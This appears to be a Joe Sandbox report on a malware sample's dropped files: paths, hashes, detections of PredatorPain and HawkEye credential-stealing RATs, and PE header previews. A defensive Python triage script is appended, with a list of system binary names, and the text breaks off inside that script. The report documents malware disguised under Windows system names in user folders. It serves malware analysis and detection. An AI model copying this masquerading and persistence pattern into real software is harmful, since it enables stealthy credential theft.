                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):7.087713047609385
                                                                    Encrypted:false
                                                                    SSDEEP:1536:/b6C9CMsKBeopXORMapFNglr9JWPSRMMr+caHhGUD10D:z6wthpXeMogpmS6yz
                                                                    MD5:3F620FFD8BE649D1D31AB54F73A559BE
                                                                    SHA1:7674D564413FF4C10297C1D74CD1287776AF43FA
                                                                    SHA-256:60E2A0345F0250CB42AF7B40D674D4EFB3110CD2AE74CB2708F0A9941B1F0AA4
                                                                    SHA-512:0783FBBC5036B5666D57036F58041D08A912BE0B791DC81BA23BE13870F10D909F2C1792852EE2B03344EAB6370E140895545B57C614E96A10B8BFC7682E2D31
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................H...........".....Rich..........PE..L...31*a.................p... ......L.............@.................................~q.......................................m..(...........................................................................(... ....................................text...<`.......p.................. ..`.data...............................@....rsrc...............................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\SImg1.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):121521
                                                                    Entropy (8bit):7.928604107100963
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZBJwP2HEzvSx2pX8KXI3YaWWku0bKTy:/5TrzTwfW2zJwP2HEzvSuJdUy
                                                                    MD5:CF9EF68993AD0C8075B4789D5B3F7897
                                                                    SHA1:F991B68333095A54D399A6A5207E3CB479A5B844
                                                                    SHA-256:D448AB7674AEC35432DB9C113CD8E766539E6AC623FA3E17043E806D1A91A205
                                                                    SHA-512:74771718AF098B1A53B1F7166E40665400264424E418F61BDB15CA88E06EB01C8C74EA03D568F4F2E3B126786E7933EE28D4B365A441D34D350C982B9CB3F8AE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg2.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):131323
                                                                    Entropy (8bit):7.925809151767899
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZqaZde3F+gQckwFSmZ9u1LATYq3Vg2WWW7rGcb:/5TrzTwfW28g83F+Od4mu1UThtcb
                                                                    MD5:0C304E96FCE61F274A08F42FF2633F75
                                                                    SHA1:AD125368FFCA36960F459B92C45E05CABECB2BCA
                                                                    SHA-256:57F36FEEA2926B03C4945852B6C47DD08B527F6BBE0DB6A6B3F101786290FBA1
                                                                    SHA-512:633D52188EEAF0D824E053DF430D9BFE40EC8A6C068887B5BDB94FF458BD5228A9C1F3EFE454E003E3A945DF7803FDE73584C6692721B300BD0E0ACE26897853
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg3.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):129761
                                                                    Entropy (8bit):7.9315607020066965
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZH2CIyZl+SuG6vPh9/FjJ4PzzDg9fM:/5TrzTwfW2oHyZlBmh9/F5M
                                                                    MD5:E87D0E3977F2EF8E5FD0EA5D6867C92D
                                                                    SHA1:5B1C2EA6D347173DD611A5213A0E5DADD2A0814B
                                                                    SHA-256:4AB6FF2F6D8A439724FDDCC2690E709CC479D4575B917AB984888CD6A1011168
                                                                    SHA-512:3E30AA8F4E40DB50F48825AD96F8D95A3A6408DF3B8B763EC3342E48AC4F7A9A9E77BC79594CAC99B4ED7D0A6E5D9B176C944499AB069F035D53F555C2C4D9BE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SImg4.jpeg
                                                                    Process:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):121818
                                                                    Entropy (8bit):7.934248352298517
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTwfOL2Xo/tIZ5XouE/mh6bVPohqGR7zENzJZUVG:/5TrzTwfW2RImhsVyqGR7wJZUVG
                                                                    MD5:70019051D7AFD8A82FA3EA49FD663358
                                                                    SHA1:F4E685B2959544C50312AF7A56A597C238F053B2
                                                                    SHA-256:B3EBB3DDA23166785394F79BC48126B21F135D5445DE883656AFF7F968A38956
                                                                    SHA-512:9FD5F456E6BC6BC13D860A51362AF1580879D43195C385DFE2C43F1B4043DAEC4A17F1D0C07CC041C2EBD2EA4DD5C356B96A4416E502E24A022ACD3F1C8CBEE7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\Startup SImg.jpeg
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                    Category:dropped
                                                                    Size (bytes):113445
                                                                    Entropy (8bit):7.935166940604218
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rj5TsEzTzvK3yxIGTp4dspGdkIZA9HB1DMG:/5TrzTTK3yxIGTp4WpGdkI6iG
                                                                    MD5:E95B1152C68A79B00F40FD6ED544B1E0
                                                                    SHA1:7A61C83E1163C62F4E4991C5ADD7A354196C475B
                                                                    SHA-256:104A575ECACD0B4E48F1830677B95C3C76D5B1D7EE4A8EF2284617C528C5D782
                                                                    SHA-512:35F4977B1C9795AF5E791D0ACCA5A803E9D27F6BA7D28F8952EBC1A79A9C024805188F4F9B3BA249C1062BAC8C17B0941936C62AA2D8CC7D838C84A78988AB2C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                    C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):47
                                                                    Entropy (8bit):4.296728947874153
                                                                    Encrypted:false
                                                                    SSDEEP:3:oNWXp5cViE2J5xAIVJBUA:oNWXp+N23fVJBUA
                                                                    MD5:B5A38E1E1187076DD0FF50A0F366A697
                                                                    SHA1:6B5FE1C661D1EBFBCC10AEE318508A2FB9F5ACC7
                                                                    SHA-256:81F0716C0370690C4BAA4624AA49C1E755FFE9D341F61C457EFAC3837CD14B3D
                                                                    SHA-512:E3AAAEF247D18D1B65362C764B53291DA8E73E7058122D9B4D5F3343D79C88C6A2E6D6786D8AB518C41D7737C3DD73B4BC2F23E4B01C59AFAEE9C1AB21F94539
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):724480
                                                                    Entropy (8bit):6.369212575152287
                                                                    Encrypted:false
                                                                    SSDEEP:12288:lBQtqB5urTIoYWBQk1E+VF9mOx9TdnHx:lBQtqBorTlYWBhE+V3mO7L
                                                                    MD5:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    SHA1:419AB2F062AEB985DB1F11D44EE6C0177F7E59A9
                                                                    SHA-256:4F21D6AF6EACAE330AE755BF05739C7D8D61567CDCD3F3FF3AD57EF714D8B932
                                                                    SHA-512:8B91940041EAF7271E23BFDAF1A8F0A5C12CB9DA5D179686FD179C65F371B7FB1D1567AFF80B9EE0060A22EBBBB280E9301930B8EFB549FDD6DB01657D33AA92
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................<........... ........@.. .......................`............@.....................................W........8...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....8.......:..................@..@.reloc.......@......................@..B........................H........i..............\m..X............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*...F.(....o....o....*....(....*.s.........s.........s.........s.........s.........*.0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9..
                                                                    C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    Process:C:\Users\user\Desktop\aaVb1xEmrd.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):533504
                                                                    Entropy (8bit):6.505015338372517
                                                                    Encrypted:false
                                                                    SSDEEP:6144:gmuQqyCAobS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxX:cAoQtqB5urTIoYWBQk1E+VF9mOx9si
                                                                    MD5:83827B8CFFE67A789B03E342ED3B1572
                                                                    SHA1:E4CD65C315D7C4C37A89767E11F9C52D64753D0F
                                                                    SHA-256:029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6
                                                                    SHA-512:8AB193F75C224208A54DB6BFAA2325F34AF9CDF29C67E01F1CE492D36696E2F6ADEB54D18060D2ECD2F5FF6A8794E399D633556446C25ED50A9363460E88EEB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................6........... ........@.. ....................................@.................................d...W.... ..R3...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...R3... ...4..................@..@.reloc.......`......."..............@..B........................H.......0}..4..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):724480
                                                                    Entropy (8bit):6.369212575152287
                                                                    Encrypted:false
                                                                    SSDEEP:12288:lBQtqB5urTIoYWBQk1E+VF9mOx9TdnHx:lBQtqBorTlYWBhE+V3mO7L
                                                                    MD5:A0DBD1314D214588960B1E0BCED5F4E0
                                                                    SHA1:419AB2F062AEB985DB1F11D44EE6C0177F7E59A9
                                                                    SHA-256:4F21D6AF6EACAE330AE755BF05739C7D8D61567CDCD3F3FF3AD57EF714D8B932
                                                                    SHA-512:8B91940041EAF7271E23BFDAF1A8F0A5C12CB9DA5D179686FD179C65F371B7FB1D1567AFF80B9EE0060A22EBBBB280E9301930B8EFB549FDD6DB01657D33AA92
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................<........... ........@.. .......................`............@.....................................W........8...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....8.......:..................@..@.reloc.......@......................@..B........................H........i..............\m..X............................................0..........(....(.......(.....o....*......................(......o......o......o......o....*...F.(....o....o....*....(....*.s.........s.........s.........s.........s.........*.0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0..........~....o....*..0............{....(...+}.....{....*...{....3.*.,.r...ps....z..|....o...+*...0................,.........o....9..
                                                                    C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\taskhost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):533504
                                                                    Entropy (8bit):6.505015338372517
                                                                    Encrypted:false
                                                                    SSDEEP:6144:gmuQqyCAobS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxX:cAoQtqB5urTIoYWBQk1E+VF9mOx9si
                                                                    MD5:83827B8CFFE67A789B03E342ED3B1572
                                                                    SHA1:E4CD65C315D7C4C37A89767E11F9C52D64753D0F
                                                                    SHA-256:029910F3FC7C1BC1DAA32A70BD334CCC767E7A0D0BDC011881099C9507ADB3B6
                                                                    SHA-512:8AB193F75C224208A54DB6BFAA2325F34AF9CDF29C67E01F1CE492D36696E2F6ADEB54D18060D2ECD2F5FF6A8794E399D633556446C25ED50A9363460E88EEB6
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3*a.....................6........... ........@.. ....................................@.................................d...W.... ..R3...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...R3... ...4..................@..@.reloc.......`......."..............@..B........................H.......0}..4..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                    Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):2.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:C7:C7
                                                                    MD5:2E6D9C6052E99FCDFA61D9B9DA273CA2
                                                                    SHA1:33C6272DF8483166FFB4295472824F971762E64A
                                                                    SHA-256:B7B598D56A5096E61D7B35CC791EA1E21484BDD778FB8A2EBC52E1045E8255B9
                                                                    SHA-512:A37EE8D831141574064DB582050E33DD2E8846E901E6477BF7C5B7440A407B1E49166736E4C6BFBF0BD12AE68D805C7DC81DB10D661E7F72F59464209D4AD305
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 5204
                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                    Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):49
                                                                    Entropy (8bit):4.441568140944513
                                                                    Encrypted:false
                                                                    SSDEEP:3:oNWXp5cViEaKC59KYr4a:oNWXp+NaZ534a
                                                                    MD5:6078085422A31D60FCEB24D4FA24B6E8
                                                                    SHA1:0CD056478F3D877B3D44C7B439485B1ACFD78F5A
                                                                    SHA-256:9113E6728CEB1F460E3CEAB19852A31602CD77A92E7B861802FE339FD5CFD837
                                                                    SHA-512:22CE5D96BB25519CB14F27BDB44D7FAEDC6D5C8B8F81A1F972EA638BF9731D8793C98359D7C9476D50AF46346E0964E82F5B0B2F8B1B6763B078D2B045FB2EA1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
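The dropped-file list above carries two triage signals worth automating: system-binary names (taskhost.exe, svchost.exe) written into and run from user-writable paths, and the same SHA-256 (029910F3...ADB3B6) appearing at two locations, which shows taskhost.exe and WindowsUpdate.exe are one payload copied for a second persistence point. The script below is an added example, not part of this report or of Joe Sandbox; the records are transcribed from the entries above, the System32 svchost.exe line is a constructed benign control with a placeholder hash, and SYSTEM_BINARIES is a hypothetical short list that a real deployment would build from a clean System32 inventory.

```python
import ntpath
from collections import defaultdict

# Windows binaries whose names this sample reuses for its drops and injection hosts.
# Hypothetical short list for the example; derive the real one from a clean System32 inventory.
SYSTEM_BINARIES = {"taskhost.exe", "svchost.exe", "iexplore.exe", "explorer.exe", "lsass.exe", "csrss.exe"}
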